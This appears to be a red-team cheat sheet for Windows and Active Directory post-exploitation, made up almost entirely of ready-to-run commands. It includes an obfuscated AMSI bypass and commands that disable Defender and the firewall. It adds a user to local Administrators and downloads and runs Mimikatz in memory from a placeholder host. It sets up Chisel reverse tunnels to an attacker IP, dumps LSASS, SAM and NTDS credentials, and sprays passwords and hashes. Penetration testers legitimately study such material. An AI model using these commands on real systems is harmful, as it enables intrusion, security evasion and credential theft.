Preparation

Persistence

#Add user to admins
net localgroup Administrators {Domain\USER} /add

Bypassing Security

Powershell

#Language Mode
$ExecutonContext.SessionState.LanguageMode

#Execution policy
powershell -ep bypass
powershell -c {cmd}
powershell -encodedcommand $env:PSExecutionPolicyPreference="bypass"

AMSI

#powershell
S`eT-It`em ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile')  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )


#Invisi-Shell
RunWithPathAsAdmin.bat
RunWithRegistryNonAdmin.bat

Disabling Security

Defender

Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus
Set-MpPreference -DisableOAVPrrotection $true

AMSI

Set-MpPreference -DisableScriptScanning 1

Firewall

netsh firewall set opmode disable
netsh Advfirewall set allprofiles state off

Importing Modules

Local file

Import-Module .\PowerView.ps1
..\PowerUp.ps1

In memory

powershell -nop -exec bypass "IEX (New-Object Net.WebClient).DownloadString('https://IP/Invoke-Mimikatz.ps1')"

Enabling PS-Remoting and RDP

#remoting
Powershell -ep bypass Enable-PSRemoting -force

#rdp
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Pivoting

Local

./chisel server -p 80 --revers

Pivot Point

.\Chisel.exe client {AttackerIP}:80 R:1080:socks

Credentials

Dumping Credentials

LSASS

#Mimikatz
Invoke-Mimikatz -Command '''sekurlsa::ekeys'''
Invoke-Mimkatz -Command '''sekurlsa::logonpasswords'''

#Crackmapexec
crackmapexec smb {IP} -u {USER} -p {PASS} --lsa

#lsassy
lsassy -u {USER} -H {NTLM} -d {domain.full} {IP} --users

#procdump
Get-Process -Name LSASS
.\procdump.exe -ma {ProcNum} lsass.dump

SAM

#secretsdump
reg save HKLM\sam sam
reg save HKLM\system system
reg save HKLM\security security
impacket-secretsdump -sam sam -security security -system system LOCAL

#mimkatz
Invoke-mimkatz -Command '''lsadump::sam'''

#crackmapexec
crackmapexec smb {IP} -u {USER} -p {PASS} --sam

Scheduled Tasks

Invoke-Mimikatz -Command '''vault::cred/patch'''

ntds

Domain credentials require DA privs

#Mimikatz
Invoke-Mimikatz -Command '''lsadump::dsync /domain:{domain.full} /all'''

#CrackMapExec
crackmapexec smb {IP} -u {USER} -p {PASS} --ntds

#SecretDump
impacket-secretsdump {domain}/{USER}:{PASS}@{IP}

Spraying Credentials

Passwords

crackmapexec smb {IP} -d {domain} -u users.txt -p passwords.txt #spray as domain user
crackmapexec smb {IP} -u users.txt -p passwords.txt --local-auth #spray as local user

Hashes

crackmapexec smb {IP} -d {domain} -u users.txt -H hashes.txt #spray as domain user
crackmapexec smb {IP} -u users.txt -H hashes.txt --local-auth #spray as domain user